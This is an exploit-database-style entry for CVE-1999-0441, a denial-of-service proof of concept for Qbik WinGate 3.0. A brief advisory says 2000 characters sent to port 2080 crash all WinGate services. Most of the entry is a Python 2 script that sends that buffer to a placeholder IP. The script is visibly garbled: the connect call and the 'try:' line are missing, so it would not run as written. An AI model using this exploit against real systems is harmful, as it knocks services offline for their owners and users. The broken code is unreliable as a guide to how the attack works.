Qbik WinGate 3.0/Pro 4.0.1/Standard 4.0.1 - Buffer Overflow (Denial of Service) (PoC)

Related Vulnerabilities: CVE-1999-0441  
Publish Date: 22 Feb 1999
Author: Prizm
                source: http://www.securityfocus.com/bid/509/info

WinGate's Winsock redirector service is susceptible to a buffer overflow vilnerability that will crash all WinGate services.

# Qbik Wingate 3.0 DoS Proof of Concept Code.
# Vulnerability Discovered by eEye Digital Security
# Simple Script by Prizm(Prizm@Resentment.org)
# By connecting to port 2080 on a system running Qbik Wingate 3.0 and
# sending 2000
# characters, all wingate services will crash.
# *Solution* Upgrade to 4.0.1, version is not vulnerable to this Denial of
# Service attack. 
# This *simple* little script will crash all wingate services.

import socket
import sys
from string import strip

host="xxx.xxx.xxx.xxx" # Replace x's with IP.
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

  print "connection succeeded."
except socket.error, e:
  print "connection failed, " + e.args

s.send("A" * 2000)
